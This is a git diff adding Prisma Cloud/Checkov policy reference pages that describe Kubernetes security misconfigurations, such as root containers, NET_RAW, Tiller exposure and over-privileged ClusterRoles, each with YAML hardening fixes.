Helm, Kustomize + +|=== + + +=== Description + + +Every Kubernetes installation has a service account called _default_ that is associated with every running pod. +Similarly, to enable pods to make calls to the internal API Server endpoint, there is a *ClusterIP* service called _Kubernetes_. +This combination makes it possible for internal processes to call the API endpoint. +We recommend that users create their own user-managed service accounts and grant the appropriate roles to each service account. 
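+
+As an illustration of the recommendation above (the names here are hypothetical), a dedicated service account can be created and referenced explicitly from the pod spec instead of relying on the _default_ account:
+
+[source,yaml]
+----
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: app-sa
+---
+apiVersion: v1
+kind: Pod
+metadata:
+  name: app-pod
+spec:
++ serviceAccountName: app-sa
+  containers:
+  - name:
+    image:
+----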
+ +=== Fix - Buildtime + + +*Kubernetes* + + + + +*Option 1* + + +* *Resource:* ServiceAccount +* *Arguments:* If service name is set to default, *automountServiceAccountToken* should be set to false in order to opt out of automounting API credentials for a service account. + + +[source,default service] +---- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: default ++ automountServiceAccountToken: false +---- + + +[source, non-default service] +---- +apiVersion: v1 +kind: ServiceAccount +metadata: ++ name: +---- + + +*Option 2* + + +* *Resource:* RoleBinding / ClusterRoleBinding +* *Arguments:* *RoleBinding* grants the permissions defined in a role to a user or set of users within a specific namespace. + +*ClusterRoleBinding* grants that access cluster-wide. +To avoid activating the default service account, it should not be used as a subject in *RoleBinding* or *ClusterRoleBinding* resources. + + +[source,RoleBinding] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: +subjects: +-- kind: ServiceAccount +- name: default +---- + +[source,ClusterRoleBinding] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: +subjects: +-- kind: ServiceAccount +- name: default +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-39.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-39.adoc new file mode 100644 index 000000000..b15703936 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-39.adoc @@ -0,0 +1,99 @@ +== Images are not selected using a digest +// Images not selected using a digest + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 77c34141-aca8-4c26-8d6c-f894b8c51c71 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ImageDigest.py[CKV_K8S_43] + 
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Kubernetes, Terraform, Helm, Kustomize
+
+|===
+
+
+
+=== Description
+
+
+In some cases you may prefer to use a fixed version of an image, rather than update to newer versions.
+Docker enables you to pull an image by its digest, specifying exactly which version of an image to pull.
+Pulling using a digest allows you to "`pin`" an image to that version, and guarantee that the image you're using is always the same.
+Digests also prevent race conditions;
+if a new image is pushed while a deploy is in progress, different nodes may be pulling the images at different times, so some nodes have the new image, and some have the old one.
+Services automatically resolve tags to digests, so you don't need to manually specify a digest.
+
+////
+=== Fix - Runtime
+
+
+*CLI Command*
+
+
+To make sure the container always uses the same version of the image, you can specify its digest;
+replace `<image-name>:<tag>` with `<image-name>@<digest>` (for example, `image@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2`).
+The digest uniquely identifies a specific version of the image, so it is never updated by Kubernetes unless you change the digest value.
+//// + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* image +* *Arguments:* digest + + +[source,Container] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: image@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 +---- + +[source,image] +---- +{ + "creator": 7, + "id": 2110, + "image_id": null, + "images": [ + { + "architecture": "amd64", + "features": "", + "variant": null, ++ "digest": "sha256:1ae98b2c895d1ceeba8913ff79f422f005b7f967a311da520a88ac89180b4c39", + "os": "linux", + "os_features": "", + "os_version": null, + "size": 87342331 + } + ], + "last_updated": "2017-04-06T20:16:24.015937Z", + "last_updater": 2215, + "last_updater_username": "stackbrew", + "name": "centos5", + "repository": 54, + "full_size": 87342331, + "v2": true + } +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-4.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-4.adoc new file mode 100644 index 000000000..0261e9638 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-4.adoc @@ -0,0 +1,100 @@ +== Containers wishing to share host network namespace admitted +// Containers allowed to share host network namespace + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c6547e88-c701-4283-bb52-c415ff0340bd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespacePSP.py[CKV_K8S_4] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +In a Kubernetes cluster, every pod gets its own IP address. 
+Pods can be treated much like VMs or physical hosts from the perspectives of port allocation, naming, service discovery, load balancing, application configuration, and migration. +Sharing the host network namespace breaks the isolation between container images and can make the host visible to other containers in the pod. +In some cases, pods in the host network of a node can communicate with all pods on all nodes without using network address translation (NAT). + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* PodSecurityPolicy +* *Arguments:* hostNetwork (Optional) When set to false, Pods are unable to use their host's network namespace. + + +[source,yaml] +---- +apiVersion: policy/v1beta1 +kind: PodSecurityPolicy +metadata: + name: +spec: ++ hostNetwork: false +---- + + +To use a **PodSecurityPolicy** resource, the requesting user or target pod's service account must be authorized to use the policy. +The preferred method is to grant access to the service account. + +In the following example we use **RBAC**, a standard Kubernetes authorization mode. + +A *Role* or *ClusterRole* needs to grant access to *use* the desired policies. 
+ +*Kind*: ClusterRole + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: +rules: +- apiGroups: ['policy'] + resources: ['podsecuritypolicies'] + verbs: ['use'] + resourceNames: + - +---- + +The **ClusterRole** is then bound to the authorized service(s): + +*Kind*: ClusterRoleBinding + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: +roleRef: + kind: ClusterRole + name: + apiGroup: rbac.authorization.k8s.io +subjects: +- kind: ServiceAccount + name: + namespace: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-40.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-40.adoc new file mode 100644 index 000000000..940cc5b31 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-40.adoc @@ -0,0 +1,118 @@ +== Tiller (Helm V2) deployment is accessible from within the cluster +// Tiller (Helm V2) deployment accessible from inside the cluster + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ecab4931-c3df-4c60-97b2-70b111f0565f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py[CKV_K8S_45] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +Tiller (Helm v2) is the in-cluster component of Helm. +It interacts directly with the Kubernetes API server to install, upgrade, query, and remove Kubernetes resources. +It also stores the objects that represent releases. +Its permissive configuration could grant the users a broad range of permissions. +Helm v3 removes Tiller, and it is recommended that you upgrade: see link:doc:bc_k8s_32[Ensure Tiller (Helm V2) Is Not Deployed]. +However, this is not always feasible. 
+Restricting access to Tiller from within the cluster limits the abilities of a compromised pod or anonymous user in the cluster.
+
+////
+=== Fix - Runtime
+
+
+*CLI Command*
+
+
+[source,shell]
+----
+kubectl -n kube-system patch deployment tiller-deploy --patch '
+spec:
+  template:
+    spec:
+      containers:
+        - name: tiller
+          ports: []
+          args: ["--listen=localhost:44134"]
+'
+----
+
+////
+
+=== Fix - Buildtime
+
+
+*Kubernetes*
+
+
+* *Resource:* Container
+
+
+[source,yaml]
+----
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: tiller
+  labels:
+    app: tiller
+spec:
+  progressDeadlineSeconds: 600
+  replicas: 1
+  revisionHistoryLimit: 10
+  selector:
+    matchLabels:
+      app: helm
+      name: tiller
+  template:
+    metadata:
+      creationTimestamp: null
+      labels:
+        app: helm
+        name: tiller
+    spec:
+      automountServiceAccountToken: true
+      containers:
++ - args:
++   - --listen=localhost:44134
+        env:
+        - name: TILLER_NAMESPACE
+          value: kube-system
+        - name: TILLER_HISTORY_MAX
+          value: "0"
+        image: gcr.io/kubernetes-helm/tiller:v2.16.9
+        name: tiller
+- ports:
+- - containerPort: 44134
+-   name: tiller
+-   protocol: TCP
+- - containerPort: 44135
+-   name: http
+-   protocol: TCP
+----
diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-41.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-41.adoc
new file mode 100644
index 000000000..61882574d
--- /dev/null
+++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-41.adoc
@@ -0,0 +1,83 @@
+== Tiller (Helm v2) service is not deleted
+// Tiller (Helm v2) service not deleted
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 110b3674-1362-4d59-a721-5233965bb73d
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/TillerService.py[CKV_K8S_44]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Kubernetes, Terraform, Helm, Kustomize
+
+|===
+
+
+
+=== Description
+
+
+Tiller (Helm v2) is the in-cluster component of Helm.
+It interacts directly with the Kubernetes API server to install, upgrade, query, and remove Kubernetes resources.
+It also stores the objects that represent releases.
+Its permissive configuration could grant users a broad range of permissions.
+Helm v3 removes Tiller, and it is recommended that you upgrade: see link:doc:bc_k8s_32[Ensure Tiller (Helm V2) Is Not Deployed].
+However, this is not always feasible.
+Restricting access to Tiller from within the cluster limits the abilities of a compromised pod or anonymous user in the cluster.
+After link:doc:bc_k8s_40[restricting connectivity to the Tiller deployment], the Tiller service can be deleted.
+
+////
+=== Fix - Runtime
+
+
+*CLI Command*
+
+
+`kubectl -n kube-system delete service tiller-deploy`
+////
+
+=== Fix - Buildtime
+
+
+*Kubernetes*
+
+
+* *Resource:* Service
+
+
+[source,yaml]
+----
+- apiVersion: v1
+- kind: Service
+- metadata:
+-   labels:
+-     app: helm
+-     name: tiller
+-   name: tiller-deploy
+-   namespace: kube-system
+- spec:
+-   ports:
+-   - name: tiller
+-     port: 44134
+-     protocol: TCP
+-     targetPort: tiller
+-   selector:
+-     app: helm
+-     name: tiller
+-   type: ClusterIP
+----
diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-5.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-5.adoc
new file mode 100644
index 000000000..29d48f9ae
--- /dev/null
+++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-5.adoc
@@ -0,0 +1,108 @@
+== Root containers admitted
+// Root containers allowed
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| b7323f51-842c-4c36-8e16-d0ef3d6c3be4
+
+|Checkov Check ID
+|
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py[CKV_K8S_6]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|Kubernetes, Terraform, Helm, Kustomize
+
+|===
+
+
+
+=== Description
+
+
+In Kubernetes, a container's user ID table maps to the host's user table.
+Running a process as the root user inside a container runs it as root on the host.
+Many container images use the root user to run PID 1.
+If PID 1 is compromised, an attacker has root permissions in the container, and any misconfigurations can be exploited.
+Containers that run as root frequently have more permissions than their workload requires, which, in case of compromise, could help an attacker further their exploits.
+
+=== Fix - Buildtime
+
+
+*Kubernetes*
+
+
+* *Resource:* PodSecurityPolicy
+* *Arguments:* runAsUser:rule:MustRunAsNonRoot - Prevents containers from running with root privileges.
+runAsUser:rule:MustRunAs - When the range minimum is set to 1 or higher, containers cannot run as root.
+
+
+[source,yaml]
+----
+apiVersion: policy/v1beta1
+kind: PodSecurityPolicy
+metadata:
+  name:
+spec:
+  runAsUser:
++ rule: 'MustRunAsNonRoot'
+or
+  rule: 'MustRunAs'
+  ranges:
++ - min:
+    max:
+----
+
+
+To use a **PodSecurityPolicy** resource, the requesting user or target pod's service account must be authorized to use the policy.
+
+The preferred method is to grant access to the service account.
+
+In the following example we use **RBAC**, a standard Kubernetes authorization mode.
+
+A *Role* or *ClusterRole* needs to grant access to *use* the desired policies.
+ +*Kind*: ClusterRole + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: +rules: +- apiGroups: ['policy'] + resources: ['podsecuritypolicies'] + verbs: ['use'] + resourceNames: + - +---- +The **ClusterRole** is bound to the authorized service(s): + +*Kind*: ClusterRoleBinding + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: +roleRef: + kind: ClusterRole + name: + apiGroup: rbac.authorization.k8s.io +subjects: +- kind: ServiceAccount + name: + namespace: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-6.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-6.adoc new file mode 100644 index 000000000..e75e6e046 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-6.adoc @@ -0,0 +1,100 @@ +== Containers with NET_RAW capability admitted +// Containers with NET_RAW capability allowed + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 11c377f1-a61c-4f70-be29-b09b6bf3c12e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py[CKV_K8S_7] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +NET_RAW is a default permissive setting in Kubernetes allowing ICMP traffic between containers and grants an application the ability to craft raw packets. +In the hands of an attacker NET_RAW can enable a wide variety of networking exploits from within the cluster. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* PodSecurityPolicy +* *Arguments:* requiredDropCapabilities (Optional) Defines the capabilities which must be dropped from containers. + +These capabilities are removed from the default set, and must not be added. 
+The NET_RAW capability is removed when the field includes it specifically, or when it includes *ALL*. + + +[source,yaml] +---- +apiVersion: policy/v1beta1 +kind: PodSecurityPolicy +metadata: + name: +spec: + requiredDropCapabilities: ++ - ALL +or ++ - NET_RAW +---- + + +To use a *PodSecurityPolicy* resource, the requesting user or target pod’s service account must be authorized to use the policy. The preferred method is to grant access to the service account. In the following example, we use *RBAC*, a standard Kubernetes authorization mode. + +First, a *Role* or *ClusterRole* needs to grant access to use the desired policies. + +*Kind*: ClusterRole + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: +rules: +- apiGroups: ['policy'] + resources: ['podsecuritypolicies'] + verbs: ['use'] + resourceNames: + - +---- + +The *ClusterRole* is then bound to the authorized service(s): + +*Kind*: ClusterRoleBinding + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: +roleRef: + kind: ClusterRole + name: + apiGroup: rbac.authorization.k8s.io +subjects: +- kind: ServiceAccount + name: + namespace: +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-7.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-7.adoc new file mode 100644 index 000000000..42d714eb1 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-7.adoc @@ -0,0 +1,58 @@ +== Liveness probe is not configured +// Liveness probe not configured + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0ac8c8e1-3382-43da-90bb-9d4b5b54a624 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py[CKV_K8S_8] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks
+|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +The kubelet uses liveness probes to know when to restart a container. +If a container becomes unresponsive, whether due to a deadlocked application or a multi-threading defect, restarting it can make the application more available despite the bug. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Field:* livenessProbe (Optional) The probe describes a health check to be performed against a container to determine whether it is alive. +Its arguments may include: exec, failureThreshold, httpGet, initialDelaySeconds, periodSeconds, successThreshold, tcpSocket and timeoutSeconds. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: ++ livenessProbe: + +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-8.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-8.adoc new file mode 100644 index 000000000..c52ae6ee5 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-8.adoc @@ -0,0 +1,61 @@ +== Readiness probe is not configured + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b5b36b9a-68f5-4825-9d1b-bcd3dcea2141 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py[CKV_K8S_9] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Readiness Probe is a Kubernetes capability that enables teams to make their applications more reliable and robust.
+This probe regulates under what circumstances the pod should be taken out of the list of service endpoints so that it no longer responds to requests. +Using the Readiness Probe ensures teams define what actions need to be taken to prevent failure and ensure recovery in case of unexpected errors. +https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/[Kubernetes.io Documentation] + +=== Fix - Buildtime + + +*Kubernetes* + +*Resource:* Container +*Field:* readinessProbe (Optional) + +The probe describes a health check to be performed against a container to determine whether it is ready for traffic. +Its configurations may include: exec, failureThreshold, httpGet, initialDelaySeconds, periodSeconds, successThreshold, tcpSocket and timeoutSeconds. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: ++ readinessProbe: + +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-9.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-9.adoc new file mode 100644 index 000000000..cdd443f14 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-9.adoc @@ -0,0 +1,61 @@ +== CPU request is not set +// CPU request not set + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 662c96ca-8714-4f6f-bf63-9277daafc075 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/CPURequests.py[CKV_K8S_10] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +When you specify resource requests for the containers in a pod, the scheduler uses this information to decide which node to place the
pod on. +When you set a resource limit for a container, the kubelet enforces those limits so that the running container is not allowed to use more of that resource than the limit you set. +If a container is created in a namespace that has a default CPU limit, and the container does not specify its own CPU limit, then the container is assigned the default CPU limit. +Similarly, if the namespace defines a default CPU request (through a LimitRange), Kubernetes assigns it to containers that do not specify their own request. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* resources:requests:cpu (Optional) + +Defines the CPU request size for the container. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + resources: + requests: ++ cpu: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-p3d-3.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-p3d-3.adoc new file mode 100644 index 000000000..e69de29bb diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-p3d-6.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-p3d-6.adoc new file mode 100644 index 000000000..e69de29bb diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-clusterroles-that-grant-control-over-validating-or-mutating-admission-webhook-configurations-are-minimized.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-clusterroles-that-grant-control-over-validating-or-mutating-admission-webhook-configurations-are-minimized.adoc new file mode 100644 index 000000000..2c0a254e1 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-clusterroles-that-grant-control-over-validating-or-mutating-admission-webhook-configurations-are-minimized.adoc @@ -0,0 +1,62 @@ +== Kubernetes ClusterRoles that grant control over validating or mutating
admission webhook configurations are not minimized +// Kubernetes ClusterRoles that grant control over validating or mutating admission webhook configurations not minimized + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8657200c-106e-4815-9572-b722474d1353 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RbacControlWebhooks.py[CKV_K8S_155] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +ClusterRoles that grant write permissions over admission webhooks should be minimized to reduce powerful identities in the cluster. +Validating admission webhooks can read every object admitted to the cluster, while mutating admission webhooks can read and mutate every object admitted to the cluster. +As such, ClusterRoles that grant control over admission webhooks are granting near cluster-admin privileges. +Minimize such ClusterRoles to limit the number of powerful credentials that, if compromised, could take over the entire cluster. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind*: ClusterRole +* *Arguments:* rules. ClusterRoles that grant the "create", "update" or "patch" verbs over the "mutatingwebhookconfigurations" or "validatingwebhookconfigurations" resources in the "admissionregistration.k8s.io" API group are granting control over admission webhooks.
+ + +[source,yaml] +---- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: +rules: +- apiGroups: [""] + resources: ["pods"] + verbs: ["get"] +- apiGroups: ["admissionregistration.k8s.io"] + resources: ["mutatingwebhookconfigurations"] + verbs: + - list +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-clusterroles-that-grant-permissions-to-approve-certificatesigningrequests-are-minimized.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-clusterroles-that-grant-permissions-to-approve-certificatesigningrequests-are-minimized.adoc new file mode 100644 index 000000000..89d6e0c4d --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-clusterroles-that-grant-permissions-to-approve-certificatesigningrequests-are-minimized.adoc @@ -0,0 +1,62 @@ +== Kubernetes ClusterRoles that grant permissions to approve CertificateSigningRequests are not minimized +// Kubernetes ClusterRoles that grant permissions to approve CertificateSigningRequests not minimized + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a94ddca0-7fbe-40ea-8a87-ce6c6c377c9f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RbacApproveCertificateSigningRequests.py[CKV_K8S_156] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +ClusterRoles that grant permissions to approve CertificateSigningRequests should be minimized to reduce powerful identities in the cluster. +Approving CertificateSigningRequests allows one to issue new credentials for any user or group. +As such, ClusterRoles that grant permissions to approve CertificateSigningRequests are granting cluster admin privileges. 
+Minimize such ClusterRoles to limit the number of powerful credentials that, if compromised, could take over the entire cluster. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind*: ClusterRole +* *Arguments:* rules. ClusterRoles that grant the "update" verb over "certificatesigningrequests/approval" and the "approve" verb over "signers" in the "certificates.k8s.io" API group are granting permissions to approve CertificateSigningRequests. + + +[source,yaml] +---- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: +rules: +- apiGroups: ["certificates.k8s.io"] + resources: ["certificatesigningrequests"] + verbs: ["get", "list", "create"] +x- apiGroups: ["certificates.k8s.io"] +x resources: ["certificatesigningrequests/approval"] +x verbs: ["update"] +x- apiGroups: ["certificates.k8s.io"] +x resources: ["signers"] +x verbs: ["approve"] +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-containers-do-not-run-with-allowprivilegeescalation.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-containers-do-not-run-with-allowprivilegeescalation.adoc new file mode 100644 index 000000000..a723388e7 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-containers-do-not-run-with-allowprivilegeescalation.adoc @@ -0,0 +1,59 @@ +== Containers run with AllowPrivilegeEscalation based on Pod Security Policy setting + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 59392ccc-c1a5-4a18-bd29-3513b263535d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalationPSP.py[CKV_K8S_5] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +The *AllowPrivilegeEscalation* Pod Security Policy controls whether or not a user is allowed to
set *allowPrivilegeEscalation* to *True* in a container's security context. +Setting it to *False* ensures that no child process of a container can gain more privileges than its parent. +We recommend setting *AllowPrivilegeEscalation* to *False* to ensure *RunAsUser* commands cannot bypass their existing sets of permissions. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* allowPrivilegeEscalation (Optional) If false, the pod cannot request privilege escalation. +Defaults to true. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + securityContext: ++ allowPrivilegeEscalation: false +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-default-service-accounts-are-not-actively-used.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-default-service-accounts-are-not-actively-used.adoc new file mode 100644 index 000000000..09466759d --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-default-service-accounts-are-not-actively-used.adoc @@ -0,0 +1,97 @@ +== Default Kubernetes service accounts are actively used by binding to a role or cluster role +// Default Kubernetes service accounts actively used by binding to a role or cluster role + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 58cc757b-ff58-4c84-8c47-29651b27176f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py[CKV_K8S_42] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Every Kubernetes installation has a service account called _default_ that is associated with every running pod.
+Similarly, to enable pods to make calls to the internal API Server endpoint, there is a *ClusterIP* service called _kubernetes_. +This combination makes it possible for internal processes to call the API endpoint. +We recommend that users create their own user-managed service accounts and grant the appropriate roles to each service account. + +=== Fix - Buildtime + + +*Kubernetes* + + + + +*Option 1* + + +* *Resource:* ServiceAccount +* *Arguments:* If the service account name is set to _default_, *automountServiceAccountToken* should be set to false in order to opt out of automounting API credentials for a service account. + + +[source,default service] +---- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: default ++ automountServiceAccountToken: false +---- + +[source,non-default service] +---- +apiVersion: v1 +kind: ServiceAccount +metadata: ++ name: +---- + +*Option 2* + + +* *Resource:* RoleBinding / ClusterRoleBinding +* *Arguments:* *RoleBinding* grants the permissions defined in a role to a user or set of users within a specific namespace. +*ClusterRoleBinding* grants that access cluster-wide. To avoid activating the default service account, it should not be used as a subject in *RoleBinding* or *ClusterRoleBinding* resources.
